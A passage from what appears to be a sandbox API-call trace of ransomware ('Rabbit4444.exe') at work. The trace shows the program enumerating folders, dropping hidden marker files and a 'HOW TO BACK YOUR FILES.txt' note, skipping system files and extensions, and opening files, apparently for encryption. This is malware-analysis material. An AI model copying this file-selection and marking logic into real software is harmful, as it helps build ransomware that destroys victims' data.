ListHead=0x122208, ListEntry=0x122268) returned 0x0 [0061.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff3d8, dwCreationFlags=0x0, lpThreadId=0xff3e0 | out: lpThreadId=0xff3e0*=0xd44) returned 0x278 [0061.827] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0062.450] CloseHandle (hObject=0x278) returned 1 [0062.450] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0x121fe8 [0062.450] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache" [0062.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116520 | out: hHeap=0xe0000) returned 1 [0062.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0062.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff6f8 [0062.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0062.450] RtlInitializeSListHead (in: ListHead=0x122308 | out: ListHead=0x122308) [0062.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0062.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x116520 [0062.451] RtlInterlockedPushEntrySList (in: ListHead=0x122308, ListEntry=0x1222e8 | out: ListHead=0x122308, ListEntry=0x1222e8) returned 0x0 [0062.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff6f8, dwCreationFlags=0x0, lpThreadId=0xff700 | out: lpThreadId=0xff700*=0xb08) returned 0x278 [0062.451] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0063.221] CloseHandle (hObject=0x278) returned 1 [0063.221] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0x121fe8 [0063.225] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" [0063.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113418 | out: hHeap=0xe0000) returned 1 [0063.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0063.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff6f8 [0063.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0063.228] RtlInitializeSListHead (in: ListHead=0x122048 | out: ListHead=0x122048) [0063.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fc0 [0063.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x94) returned 0x113a58 [0063.230] RtlInterlockedPushEntrySList (in: ListHead=0x122048, ListEntry=0x121fc8 | out: ListHead=0x122048, ListEntry=0x121fc8) returned 0x0 [0063.230] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff6f8, dwCreationFlags=0x0, lpThreadId=0xff700 | out: lpThreadId=0xff700*=0xd1c) returned 0x298 [0063.961] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0066.786] CloseHandle (hObject=0x298) returned 1 [0066.787] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0x1220c8 [0066.787] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" [0066.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123680 | out: hHeap=0xe0000) returned 1 [0066.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0066.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff6f8 [0066.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0066.792] RtlInitializeSListHead (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) [0066.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0066.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123380 [0066.792] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x122148 | out: ListHead=0x1220c8, ListEntry=0x122148) returned 0x0 [0066.792] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff6f8, dwCreationFlags=0x0, lpThreadId=0xff700 | out: lpThreadId=0xff700*=0x60) returned 0x298 [0066.803] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0068.519] CloseHandle (hObject=0x298) returned 1 [0068.519] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0x122268 [0068.519] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache" [0068.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bdc8 | out: hHeap=0xe0000) returned 1 [0068.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0068.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff6f8 [0068.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0068.521] RtlInitializeSListHead (in: ListHead=0x1220a8 | out: ListHead=0x1220a8) [0068.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0068.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11b508 [0068.521] RtlInterlockedPushEntrySList (in: ListHead=0x1220a8, ListEntry=0x122128 | out: ListHead=0x1220a8, ListEntry=0x122128) returned 0x0 [0068.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff6f8, dwCreationFlags=0x0, lpThreadId=0xff700 | out: lpThreadId=0xff700*=0xbec) returned 0x298 [0068.535] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0069.655] CloseHandle (hObject=0x298) returned 1 [0069.655] RtlInterlockedPopEntrySList (in: ListHead=0xf6750 | out: ListHead=0xf6750) returned 0x122348 [0069.655] lstrcpynW (in: lpString1=0x108ebd8, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" [0069.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1161e0 | out: hHeap=0xe0000) returned 1 [0069.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0069.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xff590 [0069.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0069.656] RtlInitializeSListHead (in: ListHead=0x121f88 | out: ListHead=0x121f88) [0069.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0069.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116930 [0069.656] RtlInterlockedPushEntrySList (in: ListHead=0x121f88, ListEntry=0x1220a8 | out: ListHead=0x121f88, ListEntry=0x1220a8) returned 0x0 [0069.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13df500, lpParameter=0xff590, dwCreationFlags=0x0, lpThreadId=0xff598 | out: lpThreadId=0xff598*=0xd58) returned 0x298 [0069.656] WaitForMultipleObjects (nCount=0x2, lpHandles=0x1007ac*=0x264, bWaitAll=0, dwMilliseconds=0x2710) Thread: id = 11 os_tid = 0x390 [0042.920] RtlInterlockedPopEntrySList (in: ListHead=0xf6930 | out: ListHead=0xf6930) returned 0xf63b0 [0042.920] lstrcpynW (in: lpString1=0x11ceb30, lpString2="Z:", iMaxLength=2048 | out: lpString1="Z:") returned="Z:" [0042.920] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0042.920] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0042.921] lstrcatW (in: lpString1="", lpString2="Z:" | out: lpString1="Z:") returned="Z:" [0042.921] lstrcatW (in: lpString1="Z:", lpString2="\\" | out: lpString1="Z:\\") returned="Z:\\" [0042.921] lstrcatW (in: lpString1="Z:\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\.BFC0E91B00AE8A0620D3") returned="Z:\\.BFC0E91B00AE8A0620D3" [0042.925] CreateFileW (lpFileName="Z:\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x274 [0042.930] WriteFile (in: hFile=0x274, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccaf0, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x11ccaf0*=0x3d4, lpOverlapped=0x0) returned 1 [0042.932] FlushFileBuffers (hFile=0x274) returned 1 [0042.933] SetFileAttributesW (lpFileName="Z:\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0042.933] CloseHandle (hObject=0x274) returned 1 [0042.934] lstrlenW (lpString="Z:") returned 2 [0042.934] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.934] FindFirstFileW (in: lpFileName="Z:\\*", lpFindFileData=0x11cdfe0 | out: lpFindFileData=0x11cdfe0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe2e9f84d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe2e9f84d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe2e9f84d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="")) returned 0x1027d0 [0042.934] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.934] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0042.934] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11cdfe0 | out: lpFindFileData=0x11cdfe0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21f97274, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x21f97274, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0042.934] lstrcmpiW (lpString1="Recovery", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0042.934] lstrcmpiW (lpString1="Recovery", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.934] lstrcmpiW (lpString1="Recovery", lpString2="Rabbit4444.exe") returned 1 [0042.935] lstrcmpiW (lpString1="Recovery", lpString2=".") returned 1 [0042.935] lstrcmpiW (lpString1="Recovery", lpString2="..") returned 1 [0042.935] lstrcmpiW (lpString1="Recovery", lpString2="windows") returned -1 [0042.935] lstrcmpiW (lpString1="Recovery", lpString2="bootmgr") returned 1 [0042.935] lstrcmpiW (lpString1="Recovery", lpString2="pagefile.sys") returned 1 [0042.935] lstrcmpiW (lpString1="Recovery", lpString2="boot") returned 1 [0042.935] lstrcmpiW (lpString1="Recovery", lpString2="ids.txt") returned 1 [0042.935] lstrcmpiW (lpString1="Recovery", lpString2="NTUSER.DAT") returned 1 [0042.935] lstrcpyW (in: lpString1=0x11ceb36, lpString2="Recovery" | out: lpString1="Recovery") returned="Recovery" [0042.935] SetFileAttributesW (lpFileName="Z:\\Recovery", dwFileAttributes=0x2012) returned 1 [0042.935] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery" | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0042.935] lstrcatW (in: lpString1="Z:\\Recovery", lpString2="\\" | out: lpString1="Z:\\Recovery\\") returned="Z:\\Recovery\\" [0042.935] lstrcatW (in: lpString1="Z:\\Recovery\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" [0042.936] CreateFileW (lpFileName="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0042.937] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccaf0, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x11ccaf0*=0x3d4, lpOverlapped=0x0) returned 1 [0042.939] FlushFileBuffers (hFile=0x278) returned 1 [0042.939] SetFileAttributesW (lpFileName="Z:\\Recovery\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0042.940] CloseHandle (hObject=0x278) returned 1 [0042.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6608 [0042.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x18) returned 0xf6668 [0042.940] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0xf6610 | out: ListHead=0xf6750, ListEntry=0xf6610) returned 0x0 [0042.940] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11cdfe0 | out: lpFindFileData=0x11cdfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="")) returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2="Rabbit4444.exe") returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2=".") returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2="..") returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2="windows") returned -1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2="bootmgr") returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2="pagefile.sys") returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2="boot") returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2="ids.txt") returned 1 [0042.940] lstrcmpiW (lpString1="System Volume Information", lpString2="NTUSER.DAT") returned 1 [0042.940] lstrcpyW (in: lpString1=0x11ceb36, lpString2="System Volume Information" | out: lpString1="System Volume Information") returned="System Volume Information" [0042.940] SetFileAttributesW (lpFileName="Z:\\System Volume Information", dwFileAttributes=0x12) returned 1 [0042.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0042.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3a) returned 0xf24d8 [0042.940] RtlInterlockedPushEntrySList (in: ListHead=0xf6930, ListEntry=0xf64b0 | out: ListHead=0xf6930, ListEntry=0xf64b0) returned 0x0 [0042.940] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11cdfe0 | out: lpFindFileData=0x11cdfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="")) returned 0 [0042.941] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0042.941] lstrcpyW (in: lpString1=0x11ceb36, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0042.941] CreateFileW (lpFileName="Z:\\HOW TO BACK YOUR FILES.txt" (normalized: "z:\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x274 [0042.941] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0042.941] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0042.942] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0042.942] CloseHandle (hObject=0x278) returned 1 [0042.943] CloseHandle (hObject=0x274) returned 1 [0042.943] GetCurrentThreadId () returned 0x390 [0042.943] RtlInterlockedPopEntrySList (in: ListHead=0xf6930 | out: ListHead=0xf6930) returned 0xf64b0 [0042.943] lstrcpynW (in: lpString1=0x11ceb30, lpString2="Z:\\System Volume Information", iMaxLength=2048 | out: lpString1="Z:\\System Volume Information") returned="Z:\\System Volume Information" [0042.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf24d8 | out: hHeap=0xe0000) returned 1 [0042.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0042.943] lstrcatW (in: lpString1="", lpString2="Z:\\System Volume Information" | out: lpString1="Z:\\System Volume Information") returned="Z:\\System Volume Information" [0042.943] lstrcatW (in: lpString1="Z:\\System Volume Information", lpString2="\\" | out: lpString1="Z:\\System Volume Information\\") returned="Z:\\System Volume Information\\" [0042.943] lstrcatW (in: lpString1="Z:\\System Volume Information\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\System Volume Information\\.BFC0E91B00AE8A0620D3") returned="Z:\\System Volume Information\\.BFC0E91B00AE8A0620D3" [0042.943] CreateFileW (lpFileName="Z:\\System Volume Information\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\system volume information\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x274 [0042.944] WriteFile (in: hFile=0x274, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccaf0, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x11ccaf0*=0x3d4, lpOverlapped=0x0) returned 1 [0042.948] FlushFileBuffers (hFile=0x274) returned 1 [0042.949] SetFileAttributesW (lpFileName="Z:\\System Volume Information\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0042.949] CloseHandle (hObject=0x274) returned 1 [0042.949] lstrlenW (lpString="Z:\\System Volume Information") returned 28 [0042.949] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.949] FindFirstFileW (in: lpFileName="Z:\\System Volume Information\\*", lpFindFileData=0x11cdfe0 | out: lpFindFileData=0x11cdfe0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0xe2ec59d2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102550 [0042.949] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.949] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0042.949] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0042.949] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.950] FindNextFileW (in: hFindFile=0x102550, lpFindFileData=0x11cdfe0 | out: lpFindFileData=0x11cdfe0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0xe2ec59d2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.950] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.950] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0042.950] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0042.950] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.950] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.950] FindNextFileW (in: hFindFile=0x102550, lpFindFileData=0x11cdfe0 | out: lpFindFileData=0x11cdfe0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe2ec59d2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe2ec59d2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe2ec59d2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="")) returned 1 [0042.950] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.950] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0042.950] FindNextFileW (in: hFindFile=0x102550, lpFindFileData=0x11cdfe0 | out: lpFindFileData=0x11cdfe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8983e192, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tracking.log", cAlternateFileName="")) returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2="Rabbit4444.exe") returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2=".") returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2="..") returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2="windows") returned -1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2="bootmgr") returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2="pagefile.sys") returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2="boot") returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2="ids.txt") returned 1 [0042.950] lstrcmpiW (lpString1="tracking.log", lpString2="NTUSER.DAT") returned 1 [0042.950] lstrcpyW (in: lpString1=0x11ceb6a, lpString2="tracking.log" | out: lpString1="tracking.log") returned="tracking.log" [0042.950] SetFileAttributesW (lpFileName="Z:\\System Volume Information\\tracking.log", dwFileAttributes=0x22) returned 1 [0042.950] SetFileAttributesW (lpFileName="Z:\\System Volume Information\\tracking.log", dwFileAttributes=0x6) returned 1 [0042.951] lstrlenW (lpString="tracking.log") returned 12 [0042.951] lstrlenW (lpString="Rabbit4444") returned 10 [0042.951] lstrcmpiW (lpString1="acking.log", lpString2="Rabbit4444") returned -1 [0042.951] lstrlenW (lpString=".dll") returned 4 [0042.951] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0042.951] lstrlenW (lpString=".lnk") returned 4 [0042.951] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0042.951] lstrlenW (lpString=".ini") returned 4 [0042.951] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0042.951] lstrlenW (lpString=".sys") returned 4 [0042.951] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0042.951] CreateFileW (lpFileName="Z:\\System Volume Information\\tracking.log" (normalized: "z:\\system volume information\\tracking.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0042.951] QueryPerformanceFrequency (in: lpFrequency=0x11cbfb0 | out: lpFrequency=0x11cbfb0*=100000000) returned 1 [0042.951] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfb8 | out: lpPerformanceCount=0x11cbfb8*=13426186888) returned 1 [0042.951] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x11cc010 | out: lpFileSize=0x11cc010*=20480) returned 1 [0042.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0xfc9e8 [0042.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0042.951] CreateFileMappingW 